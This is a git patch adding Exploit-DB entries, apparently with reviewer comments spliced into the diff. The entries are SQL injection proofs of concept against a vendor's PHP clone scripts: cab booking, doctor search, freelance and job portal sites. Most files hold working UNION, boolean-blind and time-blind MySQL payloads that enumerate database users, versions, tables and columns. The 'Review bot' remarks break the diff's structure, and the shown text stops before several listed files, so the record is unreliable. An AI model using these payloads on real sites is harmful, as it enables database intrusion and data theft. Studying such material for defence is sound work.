From e37fd2bae34347008ae6550e7969a30749236a21 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Mon, 11 Dec 2017 05:02:14 +0000 Subject: [PATCH] DB: 2017-12-11 18 changes to exploits/shellcodes Nearbuy Clone Script 3.2 - 'search' SQL Injection Cab Booking Script 1.0 - 'city' SQL Injection Chartered Accountant Booking Script 1.0 - 'city' SQL Injection Child Care Script 1.0 - 'city' SQL Injection CMS Auditor Website 1.0 - SQL Injection Co-work Space Search Script 1.0 - 'city' SQL Injection Yoga Class Script 1.0 - 'list?city' SQL Injection Consumer Complaints Clone Script 1.0 - 'id' SQL Injection Entrepreneur Job Portal Script 2.0.6 - 'jobsearch_all.php?rid1' SQL Injection Doctor Search Script 1.0 - 'city' SQL Injection Food Order Script 1.0 - 'list?city' SQL Injection E-commerce MLM Software 1.0 - SQL Injection Facebook Clone Script 1.0 - 'id' / 'send' SQL Injection Event Calendar Category Script 1.0 - 'city' SQL Injection Freelance Website Script 2.0.6 - 'pr_id' / 'catid' SQL Injection Hot Scripts Clone 3.1 - 'subctid' / 'mctid' SQL Injection Foodspotting Clone Script 1.0 - 'quicksearch.php?q' SQL Injection Kickstarter Clone Acript 2.0 - 'projid' SQL Injection --- exploits/php/webapps/43268.txt | 34 +++++++++++++++++++++ exploits/php/webapps/43269.txt | 28 +++++++++++++++++ exploits/php/webapps/43270.txt | 27 +++++++++++++++++ exploits/php/webapps/43271.txt | 27 +++++++++++++++++ exploits/php/webapps/43272.txt | 26 ++++++++++++++++ exploits/php/webapps/43273.txt | 26 ++++++++++++++++ exploits/php/webapps/43274.txt | 28 +++++++++++++++++ exploits/php/webapps/43275.txt | 28 +++++++++++++++++ exploits/php/webapps/43276.txt | 28 +++++++++++++++++ exploits/php/webapps/43277.txt | 40 +++++++++++++++++++++++++ exploits/php/webapps/43279.txt | 28 +++++++++++++++++ exploits/php/webapps/43280.txt | 32 ++++++++++++++++++++ exploits/php/webapps/43281.txt | 29 ++++++++++++++++++ exploits/php/webapps/43282.txt | 28 +++++++++++++++++ exploits/php/webapps/43283.txt | 55 ++++++++++++++++++++++++++++++++++ exploits/php/webapps/43284.txt | 35 
++++++++++++++++++++++ exploits/php/webapps/43285.txt | 43 ++++++++++++++++++++++++++ exploits/php/webapps/43286.txt | 25 ++++++++++++++++ files_exploits.csv | 18 +++++++++++ 19 files changed, 585 insertions(+) create mode 100644 exploits/php/webapps/43268.txt create mode 100644 exploits/php/webapps/43269.txt create mode 100644 exploits/php/webapps/43270.txt create mode 100644 exploits/php/webapps/43271.txt create mode 100644 exploits/php/webapps/43272.txt create mode 100644 exploits/php/webapps/43273.txt create mode 100644 exploits/php/webapps/43274.txt create mode 100644 exploits/php/webapps/43275.txt create mode 100644 exploits/php/webapps/43276.txt create mode 100644 exploits/php/webapps/43277.txt create mode 100644 exploits/php/webapps/43279.txt create mode 100644 exploits/php/webapps/43280.txt create mode 100644 exploits/php/webapps/43281.txt create mode 100644 exploits/php/webapps/43282.txt create mode 100644 exploits/php/webapps/43283.txt create mode 100644 exploits/php/webapps/43284.txt create mode 100644 exploits/php/webapps/43285.txt create mode 100644 exploits/php/webapps/43286.txt diff --git a/exploits/php/webapps/43268.txt b/exploits/php/webapps/43268.txt new file mode 100644 index 000000000..b601263aa --- /dev/null +++ b/exploits/php/webapps/43268.txt 
@@ -0,0 +1,34 @@
+# # # # #
+# Exploit Title: Nearbuy Clone Script 3.2 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/nearbuy-clone/
+# Demo: http://www.fxwebsolution.com/demo/arthi/nearby/
+# Version: 3.2
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# 1)
+# http://localhost/[PATH]/category_list.php?search=[SQL]
+#
+# Parameter: search (GET)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload: search=s%' AND 2775=2775 AND '%'='
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload: search=s%' AND SLEEP(5) AND '%'='
+#
+# # # # #
\ No newline at end of file
diff --git a/exploits/php/webapps/43269.txt b/exploits/php/webapps/43269.txt
new file mode 100644
index 000000000..1fea555f6
--- /dev/null
+++ b/exploits/php/webapps/43269.txt
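Review bot: The `# Description:` text in 43268.txt is the generic `The vulnerability allows an attacker to inject sql commands....`, which gives a defender nothing to act on: it does not say whether the `search` parameter of `category_list.php` is reachable without authentication, what data is exposed, or whether the vendor has a fix. I would replace it with a line such as `# SQL injection in the 'search' GET parameter of category_list.php; authentication required: (confirm); vendor fix: (confirm)`, with the author filling in the hedged parts. The same boilerplate sentence is repeated in the other files added by this commit. The recorded time-based result (`SLEEP(5)`) also tells responders what to look for in access logs for that endpoint, which is worth stating in the text.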
@@ -0,0 +1,28 @@ +# # # # # +# Exploit Title: Cab Booking Script 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/cab-booking-script-2/ +# Demo: http://fxwebsolution.com/demo/cab_booking/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/service-list?city=[SQL]&main_search= +# +# '+/*!13337UNION*/+/*!13337SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+- +# +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43270.txt b/exploits/php/webapps/43270.txt new file mode 100644 index 000000000..68b39cf8e --- /dev/null +++ b/exploits/php/webapps/43270.txt 
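Review bot: 43269.txt and 43270.txt carry the same request (`service-list?city=[SQL]&main_search=`) and the same 52-column result, and 43271, 43273, 43276, 43279, 43281 and 43282 repeat the `city=[SQL]&main_search=` form, yet none of the files refers to the others. All list the same vendor homepage, so this looks like one flaw in shared code (inferred, not stated on the page). A cross-reference line such as `# Related: 43270, 43271, 43273, 43276, 43279, 43281, 43282 (same 'city' parameter)` would show an operator running several of these products that the same fix is needed in each one: binding `city` as a query parameter instead of concatenating it.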
@@ -0,0 +1,27 @@ +# # # # # +# Exploit Title: Chartered Accountant Booking Script 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/chartered-accountant-booking-script/ +# Demo: http://fxwebsolution.com/demo/chartered-accountant/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/service-list?city=[SQL]&main_search= +# +# '+/*!13337UNION*/+/*!13337SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+- +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43271.txt b/exploits/php/webapps/43271.txt new file mode 100644 index 000000000..e08e87307 --- /dev/null +++ b/exploits/php/webapps/43271.txt 
@@ -0,0 +1,27 @@ +# # # # # +# Exploit Title: Child Care Script 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/child-care-script/ +# Demo: http://ordermanagementscript.com/demo/childcare/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/list?city=[SQL]&main_search= +# +# '+/*!11111UNION*/+/*!11111SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+- +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43272.txt b/exploits/php/webapps/43272.txt new file mode 100644 index 000000000..e2bd96e07 --- /dev/null +++ b/exploits/php/webapps/43272.txt @@ -0,0 +1,26 @@ +# # # # # +# Exploit Title: CMS Auditor Website 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/cms-auditor-website/ +# Demo: http://74.124.215.220/~projclient/client/auditor/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/news-detail/47[SQL] +# +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43273.txt b/exploits/php/webapps/43273.txt new file mode 100644 index 000000000..f2c446840 --- /dev/null 
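Review bot: 43272.txt gives only `news-detail/47[SQL]` under Proof of Concept, with no parameter name, injection class or DBMS, and the matching CSV title (`CMS Auditor Website 1.0 - SQL Injection`) names no parameter either. The injection point appears to be the numeric path segment after `news-detail/`, which matters for detection because filtering that inspects only the query string would not see it. The file should say so, e.g. `# Parameter: news id in URL path (news-detail/<id>)`. 43273.txt and 43286.txt likewise list an endpoint with nothing after it.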
+++ b/exploits/php/webapps/43273.txt @@ -0,0 +1,26 @@ +# # # # # +# Exploit Title: Co-work Space Search Script 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/co-work-space-search-script/ +# Demo: http://ordermanagementscript.com/demo/co-work-space/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/list?city=[SQL]&main_search= +# +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43274.txt b/exploits/php/webapps/43274.txt new file mode 100644 index 000000000..faa58b468 --- /dev/null +++ b/exploits/php/webapps/43274.txt @@ -0,0 +1,28 @@ +# # # # # +# Exploit Title: Consumer Complaints Clone Script 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/consumer-complaints-clone-script/ +# Demo: http://fxwebsolution.com/demo/consumer-complaints/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/other-user-profile.php?id=[SQL] +# +# -1'++/*!50000UNION*/(SELECT(1),/*!11111CONCAT_WS*/(0x203a20,USER(),VERSION()),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18))--+- +# +# +# # # # # \ No newline at end of file 
diff --git a/exploits/php/webapps/43275.txt b/exploits/php/webapps/43275.txt new file mode 100644 index 000000000..fdac6507f --- /dev/null +++ b/exploits/php/webapps/43275.txt @@ -0,0 +1,28 @@ +# # # # # +# Exploit Title: Entrepreneur Job Portal Script 2.0.6 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/entrepreneur-job-portal-script/ +# Demo: http://freelancewebdesignerchennai.com/demo/job-portal/ +# Version: 2.0.6 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/jobsearch_all.php?rid1=[SQL] +# +# -1'++UNION(SELECT(1),(2),(3),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54))--+- +# +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43276.txt b/exploits/php/webapps/43276.txt new file mode 100644 index 000000000..e1742c8be --- /dev/null +++ b/exploits/php/webapps/43276.txt 
@@ -0,0 +1,28 @@ +# # # # # +# Exploit Title: Doctor Search Script 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/doctor-search-script/ +# Demo: http://fxwebsolution.com/demo/doctorsearch/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/list?city=[SQL]&main_search= +# +# '+/*!11111UNION*/+/*!11111SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+- +# +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43277.txt b/exploits/php/webapps/43277.txt new file mode 100644 index 000000000..ce4a58cf4 --- /dev/null +++ b/exploits/php/webapps/43277.txt 
@@ -0,0 +1,40 @@ +# # # # # +# Exploit Title: E-commerce MLM Software 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/e-commerce-mlm/ +# Demo: http://74.124.215.220/~advaemlm/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/service_detail.php?pid=[SQL] +# +# -6'++UNION(SELECT(1),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))--+- +# +# +# 2) +# http://localhost/[PATH]/event_detail.php?eventid=[SQL] +# +# -18'++UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),3,4,5,6,7--+- +# +# +# 3) +# http://localhost/[PATH]/news_detail.php?newid=[SQL] +# +# -27'++UNION+ALL+SELECT+1,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.COLUMNS)WHERE(TABLE_NAME=0x6d6c6d5f61646d696e)AND(0x00)IN(@x:=concat(@x,CONCAT(LPAD(@NR:=@NR+1,2,0x30),0x3a20,column_name,0x3c62723e)))))x),3,4,5,6--+- +# +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43279.txt b/exploits/php/webapps/43279.txt new file mode 100644 index 000000000..ff6718c6f --- /dev/null +++ b/exploits/php/webapps/43279.txt 
@@ -0,0 +1,28 @@ +# # # # # +# Exploit Title: Event Search Script 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/event-search-script/ +# Demo: http://ordermanagementscript.com/demo/eventsearch/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/event-list?city=[SQL]&main_search= +# +# -176'+UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54))--+- +# +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43280.txt b/exploits/php/webapps/43280.txt new file mode 100644 index 000000000..6dda2d1e5 --- /dev/null +++ b/exploits/php/webapps/43280.txt 
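Review bot: The title inside 43279.txt is `Event Search Script 1.0 - SQL Injection` and its Software Link points at `/product/event-search-script/`, but the commit message and the `files_exploits.csv` row for 43279 call it `Event Calendar Category Script 1.0 - 'city' SQL Injection`. One of the two names is wrong, and anyone matching the index against an installed product will look for the wrong one. The CSV description and the file header should use the same product name.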
@@ -0,0 +1,32 @@ +# # # # # +# Exploit Title: Facebook Clone Script 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/facebook-clone/ +# Demo: http://smsemailmarketing.in/demo/fbclone/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an users to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/friend-profile.php?id=[SQL +# +# -1'++/*!22222UNION*/(SELECT(1),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()))--+- +# +# http://server/friend-profile.php?id=-1'++/*!22222UNION*/(SELECT(1),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()))--+- +# +# 2) +# http://localhost/[PATH]/process.php?send=[SQL +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43281.txt b/exploits/php/webapps/43281.txt new file mode 100644 index 000000000..c5806519a --- /dev/null +++ b/exploits/php/webapps/43281.txt 
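Review bot: Both request lines in 43280.txt end in an unclosed placeholder, `friend-profile.php?id=[SQL` and `process.php?send=[SQL`, where the other files in this commit write `[SQL]`. The description also reads `allows an users to inject`, where the sibling files say `an attacker`. Item 2 names `process.php?send=` but records no request method or result, so a reader cannot tell whether `send` is a GET or POST parameter. A line such as `# Parameter: send (GET or POST - confirm)` would close that gap.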
@@ -0,0 +1,29 @@ +# # # # # +# Exploit Title: Food Order Script 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/food-order-script-2/ +# Demo: http://ordermanagementscript.com/demo/food-order/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/list?city=[SQL]&main_search= +# +# '++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52))--+- +# +# http://server/list?city='++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52))--+-&main_search= +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43282.txt b/exploits/php/webapps/43282.txt new file mode 100644 index 000000000..1d39515e2 --- /dev/null +++ b/exploits/php/webapps/43282.txt 
@@ -0,0 +1,28 @@ +# # # # # +# Exploit Title: Yoga Class Script 1.0 - SQL Injection +# Dork: N/A +# Date: 09.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/yoga-class-script/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/list?city=[SQL]&main_search= +# +# -'+/*!01111UNION*/+/*!01111SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-&main_search= +# +# http://server/list?city=-'+/*!01111UNION*/+/*!01111SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-&main_search= +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43283.txt b/exploits/php/webapps/43283.txt new file mode 100644 index 000000000..d8d73ab29 --- /dev/null +++ b/exploits/php/webapps/43283.txt 
@@ -0,0 +1,55 @@ +# # # # # +# Exploit Title: Freelance Website Script 2.0.6 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/freelance-website-script/ +# Version: 2.0.6 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/jobdetails.php?pr_id=[SQL] +# +# -1'++UNION(SELECT(1),(2),(3),(4),(5),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54),(55),(56),(57),(58),(59),(60),(61),(62),(63),(64),(65),(66),(67),(68),(69),(70),(71),(72),(73),(74),(75),(76),(77),(78),(79),(80),(81),(82),(83),(84),(85),(86),(87),(88),(89),(90),(91),(92),(93),(94),(95),(96),(97),(98),(99),(100))--+- +# +# 
http://server/jobdetails.php?pr_id=-1'++UNION(SELECT(1),(2),(3),(4),(5),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54),(55),(56),(57),(58),(59),(60),(61),(62),(63),(64),(65),(66),(67),(68),(69),(70),(71),(72),(73),(74),(75),(76),(77),(78),(79),(80),(81),(82),(83),(84),(85),(86),(87),(88),(89),(90),(91),(92),(93),(94),(95),(96),(97),(98),(99),(100))--+- +# +# +# Parameter: pr_id (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: pr_id=51' AND 7083=7083 AND 'cZLs'='cZLs +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: pr_id=51' AND SLEEP(5) AND 'UHvA'='UHvA +# +# Type: UNION query +# Title: Generic UNION query (NULL) - 83 columns +# Payload: pr_id=51' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162707671,0x7755764a6b7a5561565652766766574a78435a486b457569645768756b456950765a706e4a6d7445,0x7162766a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- GImX +# +# +# 2) +# http://localhost/[PATH]/searchbycat_list.php?catid=[SQL] +# +# 
-15++UNION(SELECT(1),(2),(3),(4),(5),(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR+1,4,0x30),0x3a20,table_name,0x3c62723e))))x),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54),(55),(56),(57),(58),(59),(60),(61),(62),(63),(64),(65),(66),(67),(68),(69),(70),(71),(72),(73),(74),(75),(76),(77),(78),(79),(80),(81),(82),(83),(84),(85),(86),(87),(88))--+- +# +# http://server/searchbycat_list.php?catid=-15++UNION(SELECT(1),(2),(3),(4),(5),(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR+1,4,0x30),0x3a20,table_name,0x3c62723e))))x),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54),(55),(56),(57),(58),(59),(60),(61),(62),(63),(64),(65),(66),(67),(68),(69),(70),(71),(72),(73),(74),(75),(76),(77),(78),(79),(80),(81),(82),(83),(84),(85),(86),(87),(88))--+- +# +# Parameter: catid (GET) +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: catid=15 AND SLEEP(5)-- nGws +# +# # # # 